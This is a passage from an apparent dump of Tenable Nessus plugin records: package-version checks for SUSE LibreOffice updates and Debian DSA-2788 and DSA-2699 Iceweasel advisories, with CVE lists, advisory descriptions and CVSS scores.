rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-en-GB-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-en-ZA-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-eo-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-es-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-et-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-eu-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-fi-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-fr-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ga-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-gd-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-gl-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-gu-IN-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-he-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-hi-IN-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-hr-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-hu-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-id-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-is-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-it-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ja-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ka-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-km-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-kn-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ko-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-lt-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-mk-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ml-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-mr-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-nb-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-nl-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-nn-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-nr-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-om-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-or-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-pa-IN-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-pl-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-prebuilt-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-pt-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-pt-BR-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ro-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ru-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-rw-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-sh-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-sk-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-sl-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-sr-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ss-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-st-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-sv-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ta-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-te-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-tg-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-th-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-tr-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ts-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ug-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-uk-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-ve-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-vi-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-xh-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-zh-CN-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-zh-TW-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-l10n-zu-4.1.6.2-25.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-mailmerge-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-math-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-math-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-officebean-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-officebean-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-pyuno-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-pyuno-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-sdk-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-sdk-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-writer-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-writer-debuginfo-4.1.6.2-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreoffice-writer-extensions-4.1.6.2-25.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"LibreOffice\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:20:16", "bulletinFamily": "scanner", "description": "Multiple security issues have been found in iceweasel, Debian's version of the Mozilla Firefox web browser: multiple memory safety errors, and other implementation errors may lead to the execution of arbitrary code.\n\nThe iceweasel version in the oldstable distribution (squeeze) is no longer supported with security updates.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-2788.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=70722", "published": "2013-11-01T00:00:00", "title": "Debian DSA-2788-1 : iceweasel - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2788. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70722);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/10 11:49:36\");\n\n script_cve_id(\"CVE-2013-5590\", \"CVE-2013-5595\", \"CVE-2013-5597\", \"CVE-2013-5599\", \"CVE-2013-5600\", \"CVE-2013-5601\", \"CVE-2013-5602\", \"CVE-2013-5604\");\n script_bugtraq_id(63415, 63421, 63422, 63423, 63424, 63427, 63428, 63430);\n script_xref(name:\"DSA\", value:\"2788\");\n\n script_name(english:\"Debian DSA-2788-1 : iceweasel - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in iceweasel, Debian's\nversion of the Mozilla Firefox web browser: multiple memory safety\nerrors, and other implementation errors may lead to the execution of\narbitrary code.\n\nThe iceweasel version in the oldstable distribution (squeeze) is no\nlonger supported with security updates.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/iceweasel\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2788\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the iceweasel packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 17.0.10esr-1~deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceweasel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dbg\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dev\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ach\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-af\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-all\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-an\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ar\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-as\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ast\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-be\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bg\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-bd\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-in\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-br\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bs\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ca\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cs\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-csb\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cy\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-da\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-de\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-el\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-gb\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-za\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eo\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-ar\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-cl\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-es\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-mx\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-et\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eu\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fa\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ff\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fi\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fr\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fy-nl\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ga-ie\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gd\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gl\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gu-in\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-he\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hi-in\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hr\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hsb\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hu\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hy-am\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-id\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-is\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-it\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ja\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-kk\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-km\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-kn\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ko\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ku\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lij\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lt\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lv\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mai\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mk\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ml\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mr\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ms\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nb-no\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nl\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nn-no\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-or\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pa-in\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pl\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pt-br\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pt-pt\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-rm\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ro\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ru\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-si\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sk\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sl\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-son\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sq\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sr\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sv-se\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ta\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-te\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-th\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-tr\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-uk\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-vi\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-xh\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zh-cn\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zh-tw\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zu\", reference:\"17.0.10esr-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:59", "bulletinFamily": "scanner", "description": "Multiple security issues have been found in Iceweasel, Debian's version of the Mozilla Firefox web browser: Multiple memory safety errors, missing input sanitising vulnerabilities, use-after-free vulnerabilities, buffer overflows and other programming errors may lead to the execution of arbitrary code, privilege escalation, information leaks or cross-site-scripting.\n\nWe're changing the approach for security updates for Iceweasel, Icedove and Iceape in stable-security: Instead of backporting security fixes, we now provide releases based on the Extended Support Release branch. As such, this update introduces packages based on Firefox 17 and at some point in the future we will switch to the next ESR branch once ESR 17 has reached it's end of life.\n\nSome Xul extensions currently packaged in the Debian archive are not compatible with the new browser engine. Up-to-date and compatible versions can be retrieved from http://addons.mozilla.org as a short term solution. A solution to keep packaged extensions compatible with the Mozilla releases is still being sorted out.\n\nWe don't have the resources to backport security fixes to the Iceweasel release in oldstable-security any longer. If you're up to the task and want to help, please get in touch with team@security.debian.org. Otherwise, we'll announce the end of security support for Iceweasel, Icedove and Iceape in Squeeze in the next update round.", "modified": "2018-12-18T00:00:00", "id": "DEBIAN_DSA-2699.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=66766", "published": "2013-06-03T00:00:00", "title": "Debian DSA-2699-1 : iceweasel - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2699. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66766);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/12/18 10:18:58\");\n\n script_cve_id(\"CVE-2013-0773\", \"CVE-2013-0775\", \"CVE-2013-0776\", \"CVE-2013-0780\", \"CVE-2013-0782\", \"CVE-2013-0783\", \"CVE-2013-0787\", \"CVE-2013-0788\", \"CVE-2013-0793\", \"CVE-2013-0795\", \"CVE-2013-0796\", \"CVE-2013-0800\", \"CVE-2013-0801\", \"CVE-2013-1670\", \"CVE-2013-1674\", \"CVE-2013-1675\", \"CVE-2013-1676\", \"CVE-2013-1677\", \"CVE-2013-1678\", \"CVE-2013-1679\", \"CVE-2013-1680\", \"CVE-2013-1681\");\n script_bugtraq_id(58037, 58041, 58042, 58043, 58044, 58047, 58391, 58819, 58825, 58831, 58836, 58837, 59855, 59858, 59859, 59860, 59861, 59862, 59863, 59864, 59865, 59868);\n script_xref(name:\"DSA\", value:\"2699\");\n\n script_name(english:\"Debian DSA-2699-1 : iceweasel - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Iceweasel, Debian's\nversion of the Mozilla Firefox web browser: Multiple memory safety\nerrors, missing input sanitising vulnerabilities, use-after-free\nvulnerabilities, buffer overflows and other programming errors may\nlead to the execution of arbitrary code, privilege escalation,\ninformation leaks or cross-site-scripting.\n\nWe're changing the approach for security updates for Iceweasel,\nIcedove and Iceape in stable-security: Instead of backporting security\nfixes, we now provide releases based on the Extended Support Release\nbranch. As such, this update introduces packages based on Firefox 17\nand at some point in the future we will switch to the next ESR branch\nonce ESR 17 has reached it's end of life.\n\nSome Xul extensions currently packaged in the Debian archive are not\ncompatible with the new browser engine. Up-to-date and compatible\nversions can be retrieved from http://addons.mozilla.org as a short\nterm solution. A solution to keep packaged extensions compatible with\nthe Mozilla releases is still being sorted out.\n\nWe don't have the resources to backport security fixes to the\nIceweasel release in oldstable-security any longer. If you're up to\nthe task and want to help, please get in touch with\nteam@security.debian.org. Otherwise, we'll announce the end of\nsecurity support for Iceweasel, Icedove and Iceape in Squeeze in the\nnext update round.\"\n );\n # http://addons.mozilla.org\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://addons.mozilla.org/en-US/firefox/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/iceweasel\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2699\"\n );\n 